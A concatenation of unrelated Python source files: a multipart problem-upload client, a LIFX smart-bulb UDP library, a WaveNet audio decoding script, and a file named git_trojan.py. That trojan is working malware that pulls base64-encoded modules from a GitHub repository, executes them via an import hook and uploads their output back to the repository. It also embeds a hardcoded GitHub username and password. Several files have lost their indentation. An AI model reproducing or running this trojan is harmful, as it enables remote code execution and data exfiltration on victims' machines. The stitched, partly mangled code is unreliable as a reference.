                         "Re-uploading part_id=%r.", part_id)

    # rewind the stream after read
    part_stream.seek(0)

    path = 'bqm/multipart/{problem_id}/part/{part_id}'.format(
        problem_id=problem_id, part_id=part_id)
    headers = {
        'Content-MD5': b64digest,
        'Content-Type': 'application/octet-stream',
    }

    logger.trace("session.put(path=%r, data=%r, headers=%r)",
                 path, part_stream, headers)
    try:
        # stream the part body; Content-MD5 lets the server verify integrity
        response = session.put(path, data=part_stream, headers=headers)
    except requests.exceptions.Timeout:
        raise RequestTimeout

    if response.status_code == 401:
        raise SolverAuthenticationError()
    else:
        logger.trace("Part upload response: %r", response.text)
        response.raise_for_status()

    logger.debug("Uploaded part_id=%r of problem_id=%r", part_id, problem_id)

    return hexdigest
@staticmethod
@retried(_UPLOAD_REQUEST_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _get_multipart_upload_status(session, problem_id):
    """Fetch the upload status of a multipart problem. Sync http request.

    Returns the decoded status dict; it is guaranteed to contain the
    'status' and 'parts' keys.
    """
    logger.debug("Checking upload status of problem_id=%r", problem_id)

    path = 'bqm/multipart/{problem_id}/status'.format(problem_id=problem_id)

    logger.trace("session.get(path=%r)", path)
    try:
        response = session.get(path)
    except requests.exceptions.Timeout:
        raise RequestTimeout

    if response.status_code == 401:
        raise SolverAuthenticationError()

    logger.trace("Upload status response: %r", response.text)
    response.raise_for_status()

    problem_status = response.json()
    try:
        # validate the required fields are present
        problem_status['status']
        problem_status['parts']
    except KeyError:
        raise InvalidAPIResponseError("'status' and/or 'parts' missing")

    logger.debug("Got upload status=%r for problem_id=%r",
                 problem_status['status'], problem_id)

    return problem_status
@staticmethod
def _failsafe_get_multipart_upload_status(session, problem_id):
    """Like :meth:`._get_multipart_upload_status`, but never raises;
    on any failure a placeholder status is returned instead."""
    try:
        return Client._get_multipart_upload_status(session, problem_id)
    except Exception as e:
        logger.debug("Upload status check failed with %r", e)

    return {"status": "UNDEFINED", "parts": []}
@staticmethod
@retried(_UPLOAD_REQUEST_RETRIES, backoff=_UPLOAD_RETRIES_BACKOFF)
def _combine_uploaded_parts(session, problem_id, checksum):
    """Ask the server to combine all uploaded parts into the final
    problem, verifying against `checksum`. Sync http request."""
    logger.debug("Combining uploaded parts of problem_id=%r", problem_id)

    path = 'bqm/multipart/{problem_id}/combine'.format(problem_id=problem_id)
    body = dict(checksum=checksum)

    logger.trace("session.post(path=%r, json=%r)", path, body)
    try:
        response = session.post(path, json=body)
    except requests.exceptions.Timeout:
        raise RequestTimeout

    if response.status_code == 401:
        raise SolverAuthenticationError()

    logger.trace("Combine parts response: %r", response.text)
    response.raise_for_status()

    logger.debug("Issued a combine command for problem_id=%r", problem_id)
@staticmethod
def _uploaded_parts_from_problem_status(problem_status):
uploaded_parts = {}
if problem_status.get('status') == 'UPLOAD_IN_PROGRESS':
for part in problem_status.get('parts', ()):
part_no = part.get('part_number')
checksum = part.get('checksum', '').strip('"') # fix double-quoting bug
uploaded_parts[part_no] = checksum
return uploaded_parts
def _upload_part_worker(self, problem_id, part_no, chunk_stream,
                        uploaded_part_checksum=None):
    """Upload a single part from a worker thread.

    Returns a ``(part_no, checksum)`` pair for later verification.
    """
    with self.create_session() as session:
        checksum = self._upload_multipart_part(
            session, problem_id, part_id=part_no, part_stream=chunk_stream,
            uploaded_part_checksum=uploaded_part_checksum)

        return part_no, checksum
def _upload_problem_worker(self, problem, problem_id=None):
    """Upload a problem to SAPI using multipart upload interface.

    Orchestrates the full upload: initiate (unless resuming an existing
    upload), upload all parts in parallel (skipping parts whose remote
    checksum already matches), verify every part, and finally issue the
    combine request.

    Args:
        problem (bytes/str/file-like):
            Problem description.

        problem_id (str, optional):
            Problem ID under which to upload the problem. If omitted, a new
            problem is created.

    Returns:
        str: Problem ID of the uploaded problem.

    Raises:
        ProblemUploadError: On failure during initiate, part upload,
            verification, or combine.
    """

    # in python 3.7+ we could create the session once, on thread init,
    # via executor initializer
    with self.create_session() as session:
        chunks = ChunkedData(problem, chunk_size=self._UPLOAD_PART_SIZE_BYTES)
        size = len(chunks.view)

        if problem_id is None:
            try:
                problem_id = self._initiate_multipart_upload(session, size)
            except Exception as e:
                errmsg = ("Multipart upload initialization failed "
                          "with {!r}.".format(e))
                logger.error(errmsg)
                raise ProblemUploadError(errmsg)

        # check problem status, so we only upload parts missing or invalid
        problem_status = \
            self._failsafe_get_multipart_upload_status(session, problem_id)

        if problem_status.get('status') == 'UPLOAD_COMPLETED':
            logger.debug("Problem already uploaded.")
            return problem_id

        uploaded_parts = \
            self._uploaded_parts_from_problem_status(problem_status)

        # enqueue all parts, worker skips if checksum matches
        parts = {}
        # part numbers are 1-based; chunk enumeration is 0-based
        streams = collections.OrderedDict(enumerate(chunks))
        for chunk_no, chunk_stream in streams.items():
            part_no = chunk_no + 1
            part_future = self._upload_part_executor.submit(
                self._upload_part_worker,
                problem_id, part_no, chunk_stream,
                uploaded_part_checksum=uploaded_parts.get(part_no))

            parts[part_no] = part_future

        # wait for parts to upload/fail
        concurrent.futures.wait(parts.values())

        # verify all parts uploaded without error
        for part_no, part_future in parts.items():
            try:
                part_future.result()
            except Exception as e:
                errmsg = ("Multipart upload of problem_id={!r} failed for "
                          "part_no={!r} with {!r}.".format(problem_id, part_no, e))
                logger.error(errmsg)
                raise ProblemUploadError(errmsg)

        # verify all parts uploaded via status call
        # (check remote checksum matches the local one)
        final_problem_status = \
            self._failsafe_get_multipart_upload_status(session, problem_id)

        final_uploaded_parts = \
            self._uploaded_parts_from_problem_status(final_problem_status)
        if len(final_uploaded_parts) != len(parts):
            errmsg = "Multipart upload unexpectedly failed for some parts."
            logger.error(errmsg)
            logger.debug("problem_id=%r, expected_parts=%r, uploaded_parts=%r",
                         problem_id, parts.keys(), final_uploaded_parts.keys())
            raise ProblemUploadError(errmsg)

        for part_no, part_future in parts.items():
            _, part_checksum = part_future.result()
            remote_checksum = final_uploaded_parts[part_no]
            if part_checksum != remote_checksum:
                errmsg = ("Checksum mismatch for part_no={!r} "
                          "(local {!r} != remote {!r})".format(
                              part_no, part_checksum, remote_checksum))
                logger.error(errmsg)
                raise ProblemUploadError(errmsg)

        # send parts combine request
        combine_checksum = Client._combined_checksum(final_uploaded_parts)
        try:
            self._combine_uploaded_parts(session, problem_id, combine_checksum)
        except Exception as e:
            errmsg = ("Multipart upload of problem_id={!r} failed on parts "
                      "combine with {!r}".format(problem_id, e))
            logger.error(errmsg)
            raise ProblemUploadError(errmsg)

        return problem_id
|
liffylights.py | '''
liffylights by TangoAlpha - LIFX Python library
https://github.com/TangoAlpha/liffylights
Published under the MIT license - See LICENSE file for more details.
Not associated with or endorsed by LiFi Labs, Inc. (http://www.lifx.com/)
'''
# pylint: disable=missing-docstring
import threading
import time
import queue
import socket
import io
import ipaddress
import struct
from struct import pack
from enum import IntEnum
# -- socket / protocol constants --
UDP_PORT = 56700         # UDP port for listening socket
BUFFERSIZE = 1024        # socket buffer size
SHORT_MAX = 65535        # short int maximum
BYTE_MAX = 255           # byte value maximum

# -- packet retransmission tuning --
ACK_RESEND = 0.5         # resend packets every n seconds
ACK_TIMEOUT = 5          # seconds before giving up on packet
SEQUENCE_BASE = 1        # packet sequence base (0 is for bulb sends)
SEQUENCE_COUNT = 255     # packet sequence count

# -- valid ranges for LIFX HSBK color values --
HUE_MIN = 0              # LIFX hue minimum value
HUE_MAX = 65535          # LIFX hue maximum value
SATURATION_MIN = 0       # LIFX saturation minimum value
SATURATION_MAX = 65535   # LIFX saturation maximum value
BRIGHTNESS_MIN = 0       # LIFX brightness minimum value
BRIGHTNESS_MAX = 65535   # LIFX brightness maximum value
TEMP_MIN = 2500          # LIFX temperature minimum value (kelvin)
TEMP_MAX = 9000          # LIFX temperature maximum value (kelvin)
class PayloadType(IntEnum):
    """ Message payload types.

    NOTE(review): values appear to be LIFX LAN protocol message type
    codes (GET*/SET*/STATE* request-response pairs) — confirm against
    the LIFX LAN protocol documentation.
    """
    GETSERVICE = 2
    STATESERVICE = 3
    GETHOSTINFO = 12
    STATEHOSTINFO = 13
    GETHOSTFIRMWARE = 14
    STATEHOSTFIRMWARE = 15
    GETWIFIINFO = 16
    STATEWIFIINFO = 17
    GETWIFIFIRMWARE = 18
    STATEWIFIFIRMWARE = 19
    GETPOWER1 = 20
    SETPOWER1 = 21
    STATEPOWER1 = 22
    GETLABEL = 23
    SETLABEL = 24
    STATELABEL = 25
    GETVERSION = 32
    STATEVERSION = 33
    GETINFO = 34
    STATEINFO = 35
    ACKNOWLEDGEMENT = 45
    GETLOCATION = 48
    STATELOCATION = 50
    GETGROUP = 51
    STATEGROUP = 53
    ECHOREQUEST = 58
    ECHORESPONSE = 59
    GET = 101
    SETCOLOR = 102
    STATE = 107
    GETPOWER2 = 116
    SETPOWER2 = 117
    STATEPOWER2 = 118
class Power(IntEnum):
    """ Power settings.

    Power level is a uint16; only the two extreme values (full on /
    full off) are used by this library.
    """
    BULB_ON = 65535
    BULB_OFF = 0
class LiffyLights():
""" Provides liffylights API class. """
def __init__(self, device_callback, power_callback, color_callback,
             server_addr=None, broadcast_addr=None):
    """Bind the UDP socket and start the worker threads.

    Args:
        device_callback: invoked on device discovery/state events.
        power_callback: invoked on power-state updates.
        color_callback: invoked on color-state updates.
        server_addr (str, optional): local address to bind; defaults to
            binding all interfaces ("0.0.0.0").
        broadcast_addr (str, optional): broadcast address; if omitted,
            guessed from the local address assuming a /24 network.
    """
    self._device_callback = device_callback
    self._power_callback = power_callback
    self._color_callback = color_callback

    self._packet_lock = threading.Lock()
    self._packets = []
    # NOTE(review): presumably consumed by the command-sender thread;
    # its consumer is not visible in this excerpt — verify.
    self._queue = queue.Queue(maxsize=255)

    # if no address given, bind to 0.0.0.0
    if server_addr is None:
        listener_addr = "0.0.0.0"
    else:
        listener_addr = server_addr

    # broadcast-capable UDP socket shared by all worker threads
    self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    self._sock.bind((listener_addr, UDP_PORT))

    # daemon threads: process exit does not wait for them
    self._listener = threading.Thread(target=self._packet_listener)
    self._listener.daemon = True
    self._listener.start()

    self._manager = threading.Thread(target=self._packet_manager)
    self._manager.daemon = True
    self._manager.start()

    self._sender = threading.Thread(target=self._command_sender)
    self._sender.daemon = True
    self._sender.start()

    if server_addr is None:
        # use socket address to check for broadcast packets
        self._server_addr = socket.gethostbyname(socket.getfqdn())
    else:
        self._server_addr = server_addr

    if broadcast_addr is None:
        # make best guess for broadcast address
        addr = ipaddress.ip_interface(self._server_addr + "/24")
        self._broadcast_addr = str(addr.network.broadcast_address)
    else:
        self._broadcast_addr = broadcast_addr
def _gen_header(self, sequence, payloadtype):
""" Create packet header. """
protocol = bytearray.fromhex("00 34")
source = bytearray.fromhex("42 52 4b 52")
target = bytearray.fromhex("00 00 00 00 00 00 00 00")
reserved1 = bytearray.fromhex("00 00 00 00 00 00")
sequence = pack("<B", sequence)
ack = pack(">B", 3)
reserved2 = bytearray.fromhex("00 00 00 00 00 00 00 00")
packet_type = pack("<H", payloadtype)
reserved3 = bytearray.fromhex("00 00")
# assemble header
header = bytearray(protocol)
header.extend(source)
header.extend(target)
header.extend(reserved1)
header.extend(ack)
header.extend(sequence)
header.extend(reserved2)
header.extend(packet_type)
header.extend(reserved3)
return header
def _gen_packet(self, sequence, payloadtype, payload=None):
""" Generate packet header. """
contents = self._gen_header(sequence, payloadtype)
# add payload
if payload:
contents.extend(payload)
# get packet size
size = pack("<H", len(contents) + 2)
# assemble complete packet
packet = bytearray(size)
packet.extend(contents)
return packet
def _gen_packet_setcolor(self, sequence, hue, sat, bri, kel, fade):
""" Generate "setcolor" packet payload. """
hue = min(max(hue, HUE_MIN), HUE_MAX)
sat = min(max(sat, SATURATION_MIN), SATURATION_MAX)
bri = min(max(bri, BRIGHTNESS_MIN), BRIGHTNESS_MAX)
kel = min(max(kel, TEMP_MIN), TEMP_MAX)
reserved1 = pack("<B", 0)
hue = pack("<H", hue)
saturation = pack("<H", sat)
brightness = pack("<H", bri)
kelvin = pack("<H", kel)
duration = pack("<I", fade)
# assemble payload
payload = bytearray(reserved1)
payload.extend(hue)
payload.extend(saturation)
payload.extend(brightness)
payload.extend(kelvin)
payload.extend(duration)
return self._gen_packet(sequence, PayloadType.SETCOLOR, payload)
def _gen_packet_get(self, sequence):
""" Generate "get" packet payload. """
# generate payload for Get message
return self._gen_packet(sequence, PayloadType.GET)
def _gen_packet_setpower(self, sequence, power, fade):
""" Generate "setpower" packet payload. """
level = pack("<H", Power.BULB_OFF if power == 0 else Power.BULB_ON)
duration = pack("<I", fade)
# assemble payload
payload = bytearray(level)
payload.extend(duration)
return self._gen_packet(sequence, PayloadType.SETPOWER2, payload)
def _packet_ack(self, packet, sequence):
""" Check packet for ack. """
if packet["sequence"] == sequence:
if packet["payloadtype"] == PayloadType.SETCOLOR:
# notify about colour change
self._color_callback(packet["target"],
packet["hue"],
packet["sat"],
packet["bri"],
packet["kel"])
elif packet["payloadtype"] == PayloadType.SETPOWER2:
# notify about power change
self._power_callback(packet["target"],
packet["power"])
return False
return True
def _process_packet(self, sequence):
""" Check packet list for acks. """
if self._packets:
with self._packet_lock:
self._packets[:] = [packet for packet in self._packets
if self._packet_ack(packet, sequence)]
def _packet_timeout(self, packet, now):
""" Check packet for timeout. """
if now >= packet["timeout"]:
# timed out
return False
if now >= packet["resend"]:
# resend command
self._send_command(packet)
return False
# keep packet
return True
def _packet_manager(self):
""" Watch packet list for timeouts. """
while True:
if self._packets:
with self._packet_lock:
now = time.time()
self._packets[:] = \
[packet for packet in self._packets
if self._packet_timeout(packet, now)]
# c.f. nyquist
time.sleep(ACK_RESEND / 2)
# pylint: disable=too-many-locals,too-many-statements,too-many-branches
def _packet_listener(self):
""" Packet listener. """
while True:
datastream, source = self._sock.recvfrom(BUFFERSIZE)
ipaddr, port = source
# mitigate against invalid packets
try:
sio = io.BytesIO(datastream)
dummy1, sec_part = struct.unpack("<HH",
sio.read(4))
protocol = sec_part % 4096
if protocol == 1024:
source, dummy1, dummy2, dummy3, sequence, dummy4, \
payloadtype, dummy5 = struct.unpack("<IQ6sBBQHH",
sio.read(32))
if ipaddr == self._server_addr:
# ignore any broadcast packets
pass
elif payloadtype == PayloadType.ACKNOWLEDGEMENT:
self._process_packet(sequence)
#elif payloadtype == PayloadType.STATESERVICE:
# serv, port = struct.unpack("<BI",
# sio.read(5))
#elif payloadtype == PayloadType.STATEHOSTINFO:
# sig, _tx, _rx, res = struct.unpack("<fIIh",
# sio.read(14))
#elif payloadtype == PayloadType.STATEHOSTFIRMWARE:
# build, res, ver = struct.unpack("<QQI",
# sio.read(20))
#elif payloadtype == PayloadType.STATEWIFIINFO:
# sig, _tx, _rx, res = struct.unpack("<fIIh",
# sio.read(14))
#elif payloadtype == PayloadType.STATEWIFIFIRMWARE:
# build, _reserved, ver = struct.unpack("<QQI",
# sio.read(20))
#elif payloadtype == PayloadType.STATEPOWER1:
# level, = struct.unpack("<H",
# sio.read(2))
#elif payloadtype == PayloadType.STATELABEL:
# label, = struct.unpack("<32s",
# sio.read(32))
#elif payloadtype == PayloadType.STATEVERSION:
# ven, prod, ver = struct.unpack("<HHH",
# sio.read(6))
#elif payloadtype == PayloadType.STATEINFO:
# _tm, uptm, dwntm = struct.unpack("<QQQ",
# sio.read(24))
#elif payloadtype == PayloadType.STATELOCATION:
# loc, label, upd = struct.unpack("<10s32sQ",
# sio.read(50))
#elif payloadtype == PayloadType.STATEGROUP:
# grp, label, upd = struct.unpack("<16s32sQ",
# sio.read(56))
#elif payloadtype == PayloadType.ECHORESPONSE:
# dummy1, = struct.unpack("<64s",
# sio.read(64))
elif payloadtype == PayloadType.STATE:
hue, sat, bri, kel, dummy1, power, label, dummy2 = \
struct.unpack("<HHHHhH32sQ",
sio.read(52))
name = label.decode('ascii')
name = name.replace('\x00', '')
# notify about device
self._device_callback(ipaddr, name, power, hue,
sat, bri, kel)
#elif payloadtype == PayloadType.STATEPOWER2:
# level, = struct.unpack("<H",
# sio.read(2))
# pylint: disable=broad-except
except Exception:
pass
def _send_command(self, cmd):
""" Add to command queue. """
self._queue.put(cmd)
def _command_sender(self):
""" Command sender. """
sequence = -1
while True:
cmd = self._queue.get()
ipaddr = cmd["target"]
payloadtype = cmd["payloadtype"]
if "sequence" not in cmd:
# get next sequence number if we haven't got one
sequence = (sequence + 1) % SEQUENCE_COUNT
cmd["sequence"] = sequence + SEQUENCE_BASE
packet = None
if payloadtype == PayloadType.SETCOLOR:
packet = self._gen_packet_setcolor(cmd["sequence"],
cmd["hue"],
cmd["sat"],
cmd["bri"],
cmd["kel"],
cmd["fade"])
elif payloadtype == PayloadType.SETPOWER2:
packet = self._gen_packet_setpower(cmd["sequence"],
cmd["power"],
cmd["fade"])
elif payloadtype == PayloadType.GET:
packet = self._gen_packet_get(cmd["sequence"])
if packet is not None:
try:
self._sock.sendto(packet, (ipaddr, UDP_PORT))
now = time.time()
# set timeout
if "timeout" not in cmd:
cmd["timeout"] = now + ACK_TIMEOUT
# set earliest resend time
cmd["resend"] = now + ACK_RESEND
with self._packet_lock:
self._packets.append(cmd)
# pylint: disable=broad-except
except Exception:
pass
def probe(self, ipaddr=None):
""" Probe given address for bulb. """
if ipaddr is None:
# no address so use broadcast
ipaddr = self._broadcast_addr
cmd = {"payloadtype": PayloadType.GET,
"target": ipaddr}
self._send_command(cmd)
def set_power(self, ipaddr, power, fade):
""" Send SETPOWER message. """
cmd = {"payloadtype": PayloadType.SETPOWER2,
"target": ipaddr,
"power": power,
"fade": fade}
self._send_command(cmd)
def set_color(self, ipaddr, hue, sat, bri, kel, fade):
""" Send SETCOLOR message. """
cmd = {"payloadtype": PayloadType.SETCOLOR,
"target": ipaddr,
"hue": hue,
"sat": sat,
"bri": bri,
"kel": kel,
"fade": fade}
self._send_command(cmd)
|
git_trojan.py | import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os
from github3 import login
trojan_id = "abc"
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules= []
task_queue = Queue.Queue()
configured = False
class GitImporter(object):
def __init__(self):
self.current_module_code = ""
def find_module(self,fullname,path=None):
if configured:
print "[*] Attempting to retrieve %s" % fullname
new_library = get_file_contents("modules/%s" % fullname)
if new_library is not None:
self.current_module_code = base64.b64decode(new_library)
return self
return None
def load_module(self,name):
module = imp.new_module(name)
exec self.current_module_code in module.__dict__
sys.modules[name] = module
return module
def connect_to_github():
gh = login(username="gclegane",password="%Husokatzenkatertier")
repo = gh.repository("gclegane","chapter7")
branch = repo.branch("master")
return gh,repo,branch
def get_file_contents(filepath):
gh,repo,branch = connect_to_github()
tree = branch.commit.commit.tree.recurse()
for filename in tree.tree:
if filepath in filename.path:
print "[*] Found file %s" % filepath
blob = repo.blob(filename._json_data['sha'])
return blob.content
return None
def get_trojan_config():
global configured
config_json = get_file_contents(trojan_config)
config = json.loads(base64.b64decode(config_json))
configured = True
for task in config:
if task['module'] not in sys.modules:
exec("import %s" % task['module'])
return config
def store_module_result(data):
gh,repo,branch = connect_to_github()
remote_path = "data/%s/%d.data" % (trojan_id,random.randint(1000,100000))
repo.create_file(remote_path,"Commit message",base64.b64encode(data))
return
def module_runner(module):
task_queue.put(1)
result = sys.modules[module].run()
task_queue.get()
# store the result in our repo
store_module_result(result)
return
# main trojan loop
sys.meta_path = [GitImporter()]
while True:
if task_queue.empty():
config = get_trojan_config()
for task in config:
t = threading.Thread(target=module_runner,args=(task['module'],))
t.start()
time.sleep(random.randint(1,10))
time.sleep(random.randint(1000,10000))
|
decode.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import division
import argparse
import logging
import math
import os
import sys
import numpy as np
from sklearn.preprocessing import StandardScaler
import soundfile as sf
import torch
from torch.autograd import Variable
import torch.multiprocessing as mp
from torchvision import transforms
from utils import find_files
from utils import read_hdf5
from utils import read_txt
from utils import shape_hdf5
from wavenet import decode_mu_law
from wavenet import encode_mu_law
from wavenet import WaveNet
def pad_list(batch_list, pad_value=0.0):
    """FUNCTION TO PAD VALUE

    Pads a list of variable-length feature matrices to a common length
    along the time axis.

    Args:
        batch_list (list): list of batch, where the shape of i-th batch (T_i, C)
        pad_value (float): value to pad

    Return:
        (ndarray): padded batch with the shape (B, T_max, C)

    Raises:
        ValueError: if batch_list is empty.
    """
    if not batch_list:
        raise ValueError("batch_list must contain at least one array")
    batch_size = len(batch_list)
    maxlen = max(batch.shape[0] for batch in batch_list)
    n_feats = batch_list[0].shape[-1]
    # BUG FIX: the buffer was previously created with np.zeros, silently
    # ignoring pad_value; np.full honours the requested padding value
    # (identical output for the default pad_value=0.0).
    batch_pad = np.full((batch_size, maxlen, n_feats), pad_value)
    for idx, batch in enumerate(batch_list):
        batch_pad[idx, :batch.shape[0]] = batch
    return batch_pad
def decode_generator(feat_list, batch_size=32,
                     wav_transform=None, feat_transform=None,
                     use_speaker_code=False, upsampling_factor=0):
    """DECODE BATCH GENERATOR

    Args:
        feat_list (list): list of paths to auxiliary feature files (hdf5)
        batch_size (int): batch size in decoding
        wav_transform (func): preprocessing function for waveform
        feat_transform (func): preprocessing function for aux feats
        use_speaker_code (bool): whether to use speaker code
        upsampling_factor (int): upsampling factor (0 = features are
            already at sample resolution)

    Return:
        (object): generator instance yielding either
            (feat_id, (x, h, n_samples)) when batch_size == 1, or
            (feat_ids, (batch_x, batch_h, n_samples_list)) otherwise
    """
    # NOTE(review): Variable(..., volatile=True) is the pre-0.4 PyTorch
    # inference idiom; on modern torch this flag is a no-op and
    # torch.no_grad() would be used instead.
    # for sample-by-sample generation
    if batch_size == 1:
        for featfile in feat_list:
            # seed waveform: a single zero sample
            x = np.zeros((1))
            if upsampling_factor == 0:
                h = read_hdf5(featfile, "/feat")
            else:
                # use the pre-upsampling features; the network upsamples
                h = read_hdf5(featfile, "/feat_org")
            if use_speaker_code:
                # tile the speaker code along time and append as channels
                sc = read_hdf5(featfile, "/speaker_code")
                sc = np.tile(sc, [h.shape[0], 1])
                h = np.concatenate([h, sc], axis=1)
            # perform pre-processing
            if wav_transform is not None:
                x = wav_transform(x)
            if feat_transform is not None:
                h = feat_transform(h)
            # convert to torch variable
            x = Variable(torch.from_numpy(x).long(), volatile=True)
            h = Variable(torch.from_numpy(h).float(), volatile=True)
            if torch.cuda.is_available():
                x = x.cuda()
                h = h.cuda()
            x = x.unsqueeze(0)  # 1 => 1 x 1
            h = h.transpose(0, 1).unsqueeze(0)  # T x C => 1 x C x T
            # get target length and file id
            if upsampling_factor == 0:
                n_samples = h.size(2) - 1
            else:
                n_samples = h.size(2) * upsampling_factor - 1
            feat_id = os.path.basename(featfile).replace(".h5", "")
            yield feat_id, (x, h, n_samples)
    # for batch generation
    else:
        # sort with the feature length
        # (groups similarly-sized utterances to minimise padding waste)
        if upsampling_factor == 0:
            shape_list = [shape_hdf5(f, "/feat")[0] for f in feat_list]
        else:
            shape_list = [shape_hdf5(f, "/feat_org")[0] for f in feat_list]
        idx = np.argsort(shape_list)
        feat_list = [feat_list[i] for i in idx]
        # divide into batch list
        n_batch = math.ceil(len(feat_list) / batch_size)
        batch_lists = np.array_split(feat_list, n_batch)
        batch_lists = [f.tolist() for f in batch_lists]
        for batch_list in batch_lists:
            batch_x = []
            batch_h = []
            n_samples_list = []
            feat_ids = []
            for featfile in batch_list:
                # make seed waveform and load aux feature
                x = np.zeros((1))
                if upsampling_factor == 0:
                    h = read_hdf5(featfile, "/feat")
                else:
                    h = read_hdf5(featfile, "/feat_org")
                if use_speaker_code:
                    sc = read_hdf5(featfile, "/speaker_code")
                    sc = np.tile(sc, [h.shape[0], 1])
                    h = np.concatenate([h, sc], axis=1)
                # perform pre-processing
                if wav_transform is not None:
                    x = wav_transform(x)
                if feat_transform is not None:
                    h = feat_transform(h)
                # append to list
                batch_x += [x]
                batch_h += [h]
                # per-utterance target lengths (shorter members of the
                # batch stop early during generation)
                if upsampling_factor == 0:
                    n_samples_list += [h.shape[0] - 1]
                else:
                    n_samples_list += [h.shape[0] * upsampling_factor - 1]
                feat_ids += [os.path.basename(featfile).replace(".h5", "")]
            # convert list to ndarray
            batch_x = np.stack(batch_x, axis=0)
            # zero-pad features to the longest utterance in the batch
            batch_h = pad_list(batch_h)
            # convert to torch variable
            batch_x = Variable(torch.from_numpy(batch_x).long(), volatile=True)
            batch_h = Variable(torch.from_numpy(batch_h).float(), volatile=True).transpose(1, 2)
            if torch.cuda.is_available():
                batch_x = batch_x.cuda()
                batch_h = batch_h.cuda()
            yield feat_ids, (batch_x, batch_h, n_samples_list)
def main():
    """Run parallel WaveNet decoding of auxiliary features into waveforms.

    Parses command-line arguments, splits the feature file list across
    --n_gpus worker processes, and writes one PCM-16 wav file per input
    feature file into --outdir.
    """
    parser = argparse.ArgumentParser()
    # decode setting
    parser.add_argument("--feats", required=True,
                        type=str, help="list or directory of aux feat files")
    parser.add_argument("--stats", required=True,
                        type=str, help="hdf5 file including statistics")
    parser.add_argument("--checkpoint", required=True,
                        type=str, help="model file")
    parser.add_argument("--config", required=True,
                        type=str, help="configure file")
    parser.add_argument("--outdir", required=True,
                        type=str, help="directory to save generated samples")
    parser.add_argument("--fs", default=16000,
                        type=int, help="sampling rate")
    parser.add_argument("--batch_size", default=32,
                        type=int, help="number of batch size in decoding")
    parser.add_argument("--n_gpus", default=1,
                        type=int, help="number of gpus")
    # other setting
    parser.add_argument("--intervals", default=1000,
                        type=int, help="log interval")
    parser.add_argument("--seed", default=1,
                        type=int, help="seed number")
    parser.add_argument("--verbose", default=1,
                        type=int, help="log level")
    args = parser.parse_args()
    # check directory existence
    if not os.path.exists(args.outdir):
        os.makedirs(args.outdir)
    # set log level
    # BUG FIX: the DEBUG case must be checked before the INFO case.
    # Previously `args.verbose > 0` was tested first, which made the
    # `args.verbose > 1` branch unreachable (DEBUG could never be set).
    if args.verbose > 1:
        logging.basicConfig(level=logging.DEBUG,
                            format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
                            datefmt='%m/%d/%Y %I:%M:%S',
                            filename=args.outdir + "/decode.log")
        logging.getLogger().addHandler(logging.StreamHandler())
    elif args.verbose > 0:
        logging.basicConfig(level=logging.INFO,
                            format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
                            datefmt='%m/%d/%Y %I:%M:%S',
                            filename=args.outdir + "/decode.log")
        logging.getLogger().addHandler(logging.StreamHandler())
    else:
        logging.basicConfig(level=logging.WARN,
                            format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
                            datefmt='%m/%d/%Y %I:%M:%S',
                            filename=args.outdir + "/decode.log")
        logging.getLogger().addHandler(logging.StreamHandler())
        # logging.warn is a deprecated alias; use logging.warning
        logging.warning("logging is disabled.")
    # fix seed
    os.environ['PYTHONHASHSEED'] = str(args.seed)
    np.random.seed(args.seed)
    torch.manual_seed(args.seed)
    # load config
    config = torch.load(args.config)
    # get file list
    if os.path.isdir(args.feats):
        feat_list = sorted(find_files(args.feats, "*.h5"))
    elif os.path.isfile(args.feats):
        feat_list = read_txt(args.feats)
    else:
        logging.error("--feats should be directory or list.")
        sys.exit(1)
    # prepare the file list for parallel decoding
    feat_lists = np.array_split(feat_list, args.n_gpus)
    feat_lists = [f_list.tolist() for f_list in feat_lists]
    # define transform
    # (normalization statistics are injected directly into the scaler)
    scaler = StandardScaler()
    scaler.mean_ = read_hdf5(args.stats, "/mean")
    scaler.scale_ = read_hdf5(args.stats, "/scale")
    wav_transform = transforms.Compose([
        lambda x: encode_mu_law(x, config.n_quantize)])
    feat_transform = transforms.Compose([
        lambda x: scaler.transform(x)])

    # define gpu decode function
    def gpu_decode(feat_list, gpu):
        """Decode `feat_list` on the given GPU and write wav files."""
        with torch.cuda.device(gpu):
            # define model and load parameters
            model = WaveNet(
                n_quantize=config.n_quantize,
                n_aux=config.n_aux,
                n_resch=config.n_resch,
                n_skipch=config.n_skipch,
                dilation_depth=config.dilation_depth,
                dilation_repeat=config.dilation_repeat,
                kernel_size=config.kernel_size,
                upsampling_factor=config.upsampling_factor)
            model.load_state_dict(torch.load(args.checkpoint)["model"])
            model.eval()
            model.cuda()
            torch.backends.cudnn.benchmark = True
            # define generator
            generator = decode_generator(
                feat_list,
                batch_size=args.batch_size,
                wav_transform=wav_transform,
                feat_transform=feat_transform,
                use_speaker_code=config.use_speaker_code,
                upsampling_factor=config.upsampling_factor)
            # decode
            if args.batch_size > 1:
                for feat_ids, (batch_x, batch_h, n_samples_list) in generator:
                    logging.info("decoding start")
                    samples_list = model.batch_fast_generate(
                        batch_x, batch_h, n_samples_list, args.intervals)
                    for feat_id, samples in zip(feat_ids, samples_list):
                        wav = decode_mu_law(samples, config.n_quantize)
                        sf.write(args.outdir + "/" + feat_id + ".wav", wav, args.fs, "PCM_16")
                        logging.info("wrote %s.wav in %s." % (feat_id, args.outdir))
            else:
                for feat_id, (x, h, n_samples) in generator:
                    logging.info("decoding %s (length = %d)" % (feat_id, n_samples))
                    samples = model.fast_generate(x, h, n_samples, args.intervals)
                    wav = decode_mu_law(samples, config.n_quantize)
                    sf.write(args.outdir + "/" + feat_id + ".wav", wav, args.fs, "PCM_16")
                    logging.info("wrote %s.wav in %s." % (feat_id, args.outdir))

    # parallel decode: round-robin the file shards over the gpus
    processes = []
    gpu = 0
    for i, feat_list in enumerate(feat_lists):
        p = mp.Process(target=gpu_decode, args=(feat_list, gpu,))
        p.start()
        processes.append(p)
        gpu += 1
        if (i + 1) % args.n_gpus == 0:
            gpu = 0
